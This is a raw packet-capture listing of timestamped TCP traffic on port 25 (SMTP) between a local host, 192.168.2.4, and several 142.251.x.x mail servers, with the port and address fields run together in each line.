                                                                                                                                                                                                          Dec 4, 2023 12:59:56.641479969 CET2549760142.251.167.26192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:56.641617060 CET4975925192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:56.646032095 CET2549760142.251.167.26192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:56.647483110 CET4976025192.168.2.4142.251.167.26
                                                                                                                                                                                                          Dec 4, 2023 12:59:56.676078081 CET2549758142.251.16.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:56.680376053 CET4975825192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:56.723563910 CET2549761142.251.167.26192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:56.725625992 CET2549761142.251.167.26192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:56.729404926 CET4976125192.168.2.4142.251.167.26
                                                                                                                                                                                                          Dec 4, 2023 12:59:56.742125988 CET2549759142.251.16.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:56.749362946 CET2549759142.251.16.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:56.750874043 CET4975925192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:56.770679951 CET4975925192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:56.780435085 CET2549760142.251.167.26192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:56.785909891 CET2549758142.251.16.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:56.793440104 CET2549758142.251.16.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:56.806639910 CET2549760142.251.167.26192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:56.814691067 CET4975825192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:56.828233004 CET4976025192.168.2.4142.251.167.26
                                                                                                                                                                                                          Dec 4, 2023 12:59:56.847270966 CET4975825192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:56.855895042 CET2549759142.251.16.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:56.856328964 CET4975925192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:56.861469984 CET2549761142.251.167.26192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:56.871058941 CET2549759142.251.16.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:56.871834040 CET4975925192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:56.909638882 CET2549761142.251.167.26192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:56.919334888 CET4976125192.168.2.4142.251.167.26
                                                                                                                                                                                                          Dec 4, 2023 12:59:56.925827980 CET2549758142.251.16.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:56.926317930 CET4975825192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:56.952949047 CET2549758142.251.16.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:56.953649998 CET4975825192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:56.956794977 CET2549759142.251.16.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:56.958131075 CET4975925192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:56.960534096 CET2549760142.251.167.26192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:56.964059114 CET2549760142.251.167.26192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:56.964133978 CET4976025192.168.2.4142.251.167.26
                                                                                                                                                                                                          Dec 4, 2023 12:59:56.972265005 CET2549759142.251.16.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:56.972615004 CET4975925192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.026050091 CET4975825192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.031898975 CET2549758142.251.16.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.033020973 CET4975825192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.047435045 CET2549761142.251.167.26192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.055186987 CET2549761142.251.167.26192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.058320045 CET4975925192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.059631109 CET2549759142.251.16.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.060236931 CET2549758142.251.16.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.060762882 CET4975925192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.061254025 CET4975825192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.064668894 CET4976125192.168.2.4142.251.167.26
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.073026896 CET2549759142.251.16.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.073183060 CET4975925192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.133193970 CET2549758142.251.16.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.134660006 CET4975825192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.135992050 CET4976125192.168.2.4142.251.167.26
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.140392065 CET2549758142.251.16.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.140491962 CET4975825192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.160988092 CET2549759142.251.16.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.162455082 CET4975925192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.163208008 CET2549759142.251.16.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.163283110 CET4975925192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.168668985 CET2549758142.251.16.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.169083118 CET4975825192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.173562050 CET2549759142.251.16.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.173753977 CET4975925192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.198695898 CET2549761142.251.167.26192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.198950052 CET4976125192.168.2.4142.251.167.26
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.240223885 CET2549758142.251.16.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.241163015 CET4975825192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.246273041 CET2549758142.251.16.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.246381998 CET4975825192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.262950897 CET2549759142.251.16.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.263212919 CET2549761142.251.167.26192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.263664007 CET2549759142.251.16.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.264261007 CET4975925192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.265403986 CET4976125192.168.2.4142.251.167.26
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.274187088 CET2549759142.251.16.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.274270058 CET4975925192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.274589062 CET2549758142.251.16.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.274897099 CET4975825192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.326098919 CET2549761142.251.167.26192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.326885939 CET4976125192.168.2.4142.251.167.26
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.347191095 CET2549758142.251.16.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.348295927 CET4975825192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.351636887 CET2549758142.251.16.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.351746082 CET4975825192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.364623070 CET2549759142.251.16.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.365860939 CET4975925192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.374644041 CET2549759142.251.16.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.374792099 CET4975925192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.382850885 CET2549758142.251.16.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.383193016 CET4975825192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.394834995 CET2549761142.251.167.26192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.395765066 CET4976125192.168.2.4142.251.167.26
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.455076933 CET2549758142.251.16.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.455131054 CET2549761142.251.167.26192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.455815077 CET4975825192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.456758022 CET4976125192.168.2.4142.251.167.26
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.458664894 CET2549758142.251.16.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.469146967 CET2549759142.251.16.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.470315933 CET4975925192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.477894068 CET2549759142.251.16.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.478040934 CET4975925192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.491298914 CET2549758142.251.16.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.491626024 CET4975825192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.523358107 CET2549761142.251.167.26192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.524023056 CET4976125192.168.2.4142.251.167.26
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.561501026 CET2549758142.251.16.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.562678099 CET4975825192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.570791960 CET2549759142.251.16.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.572130919 CET4975925192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.578429937 CET2549759142.251.16.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.578526020 CET4975925192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.584649086 CET2549761142.251.167.26192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.585521936 CET4976125192.168.2.4142.251.167.26
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.596988916 CET2549758142.251.16.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.597281933 CET4975825192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.651190042 CET2549761142.251.167.26192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.652034044 CET4976125192.168.2.4142.251.167.26
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.669271946 CET2549758142.251.16.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.670361042 CET4975825192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.673285961 CET2549759142.251.16.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.674729109 CET4975925192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.681205988 CET2549759142.251.16.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.681284904 CET4975925192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.703479052 CET2549758142.251.16.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.703866959 CET4975825192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.712750912 CET2549761142.251.167.26192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.713582993 CET4976125192.168.2.4142.251.167.26
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.775204897 CET2549759142.251.16.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.775913954 CET2549758142.251.16.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.776468992 CET4975925192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.777546883 CET4975825192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.779262066 CET2549761142.251.167.26192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.780252934 CET4976125192.168.2.4142.251.167.26
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.782805920 CET2549759142.251.16.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.782910109 CET4975925192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.809190035 CET2549758142.251.16.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.809732914 CET4975825192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.840862989 CET2549761142.251.167.26192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.841804981 CET4976125192.168.2.4142.251.167.26
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.876976013 CET2549759142.251.16.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.881381035 CET4975925192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.883014917 CET2549758142.251.16.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.883222103 CET2549759142.251.16.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.884166956 CET4975825192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.907562017 CET2549761142.251.167.26192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.908458948 CET4976125192.168.2.4142.251.167.26
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.915399075 CET2549758142.251.16.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.916656971 CET4975825192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.969017982 CET2549761142.251.167.26192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.972896099 CET4976125192.168.2.4142.251.167.26
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.981729984 CET2549759142.251.16.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.982719898 CET4975925192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.989562035 CET2549758142.251.16.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:57.990039110 CET4975825192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.022156000 CET2549758142.251.16.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.022541046 CET4975825192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.035873890 CET2549761142.251.167.26192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.036848068 CET4976125192.168.2.4142.251.167.26
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.083035946 CET2549759142.251.16.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.084114075 CET4975925192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.095350027 CET2549758142.251.16.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.096754074 CET4975825192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.100019932 CET2549761142.251.167.26192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.100635052 CET4976125192.168.2.4142.251.167.26
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.127998114 CET2549758142.251.16.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.128448963 CET4975825192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.164139032 CET2549761142.251.167.26192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.166826963 CET4976125192.168.2.4142.251.167.26
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.184567928 CET2549759142.251.16.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.185870886 CET4975925192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.202236891 CET2549758142.251.16.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.203275919 CET4975825192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.227778912 CET2549761142.251.167.26192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.228796959 CET4976125192.168.2.4142.251.167.26
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.233949900 CET2549758142.251.16.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.234307051 CET4975825192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.286664963 CET2549759142.251.16.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.287986040 CET4975925192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.294022083 CET2549761142.251.167.26192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.294620991 CET4976125192.168.2.4142.251.167.26
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.308926105 CET2549758142.251.16.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.312238932 CET4975825192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.340055943 CET2549758142.251.16.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.340449095 CET4975825192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.355923891 CET2549761142.251.167.26192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.356781006 CET4976125192.168.2.4142.251.167.26
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.388880014 CET2549759142.251.16.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.391793013 CET4975925192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.418968916 CET2549758142.251.16.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.420732021 CET4975825192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.421863079 CET2549761142.251.167.26192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.423055887 CET4976125192.168.2.4142.251.167.26
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.448450089 CET2549758142.251.16.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.448815107 CET4975825192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.488939047 CET2549761142.251.167.26192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.489821911 CET4976125192.168.2.4142.251.167.26
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.494659901 CET2549759142.251.16.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.496145010 CET4975925192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.529023886 CET2549758142.251.16.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.533358097 CET4975825192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.553173065 CET2549761142.251.167.26192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.557044983 CET2549758142.251.16.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.557136059 CET4976125192.168.2.4142.251.167.26
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.557712078 CET4975825192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.596698999 CET2549759142.251.16.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.599713087 CET4975925192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.617144108 CET2549761142.251.167.26192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.618419886 CET4976125192.168.2.4142.251.167.26
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.639199972 CET2549758142.251.16.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.641172886 CET4975825192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.663825035 CET2549758142.251.16.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.664107084 CET4975825192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.684403896 CET2549761142.251.167.26192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.685400009 CET4976125192.168.2.4142.251.167.26
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.700076103 CET2549759142.251.16.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.703645945 CET4975925192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.745884895 CET2549761142.251.167.26192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.746793985 CET2549758142.251.16.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.746864080 CET4976125192.168.2.4142.251.167.26
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.748241901 CET4975825192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.769752026 CET2549758142.251.16.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.770062923 CET4975825192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.804323912 CET2549759142.251.16.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.805847883 CET4975925192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.812716007 CET2549761142.251.167.26192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.813922882 CET4976125192.168.2.4142.251.167.26
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.853859901 CET2549758142.251.16.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.854968071 CET4975825192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.874341011 CET2549761142.251.167.26192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.875228882 CET4976125192.168.2.4142.251.167.26
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.875566006 CET2549758142.251.16.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.876092911 CET4975825192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.906402111 CET2549759142.251.16.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.907730103 CET4975925192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.941112995 CET2549761142.251.167.26192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.941764116 CET4976125192.168.2.4142.251.167.26
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.960479021 CET2549758142.251.16.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.961693048 CET4975825192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.981569052 CET2549758142.251.16.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:58.981797934 CET4975825192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:59.002372980 CET2549761142.251.167.26192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:59.003190041 CET4976125192.168.2.4142.251.167.26
                                                                                                                                                                                                          Dec 4, 2023 12:59:59.008227110 CET2549759142.251.16.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:59.009555101 CET4975925192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:59.070018053 CET2549758142.251.16.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:59.071297884 CET4975825192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:59.071922064 CET2549761142.251.167.26192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:59.072771072 CET4976125192.168.2.4142.251.167.26
                                                                                                                                                                                                          Dec 4, 2023 12:59:59.089957952 CET2549758142.251.16.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:59.090166092 CET4975825192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:59.113076925 CET2549759142.251.16.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:59.114578009 CET4975925192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:59.133555889 CET2549761142.251.167.26192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:59.134356022 CET4976125192.168.2.4142.251.167.26
                                                                                                                                                                                                          Dec 4, 2023 12:59:59.167948008 CET4975825192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:59.172028065 CET4975925192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:59.173751116 CET4975825192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:59.176834106 CET2549758142.251.16.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:59.177833080 CET4975825192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:59.182610989 CET4975925192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:59.183635950 CET4975825192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:59.190839052 CET4976125192.168.2.4142.251.167.26
                                                                                                                                                                                                          Dec 4, 2023 12:59:59.194279909 CET4975825192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:59.195784092 CET2549758142.251.16.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:59.195956945 CET4975825192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:59.197019100 CET4976125192.168.2.4142.251.167.26
                                                                                                                                                                                                          Dec 4, 2023 12:59:59.200047970 CET2549761142.251.167.26192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:59.200798035 CET4976125192.168.2.4142.251.167.26
                                                                                                                                                                                                          Dec 4, 2023 12:59:59.206428051 CET4975925192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:59.206451893 CET4975825192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:59.212668896 CET4975925192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:59.215097904 CET2549759142.251.16.27192.168.2.4
                                                                                                                                                                                                          Dec 4, 2023 12:59:59.216320992 CET4975925192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:59.217277050 CET4975825192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:59.224176884 CET4975925192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:59.224379063 CET4975825192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:59.231189013 CET4975825192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:59.234107971 CET4975925192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:59.242160082 CET4976125192.168.2.4142.251.167.26
                                                                                                                                                                                                          Dec 4, 2023 12:59:59.244971037 CET4975925192.168.2.4142.251.16.27
                                                                                                                                                                                                          Dec 4, 2023 12:59:59.252589941 CET4976125192.168.2.4142.251.167.26
                                                                                                                                                                                                          Dec 4, 2023 12:59:59.258997917 CET4976125192.168.2.4142.251.167.26
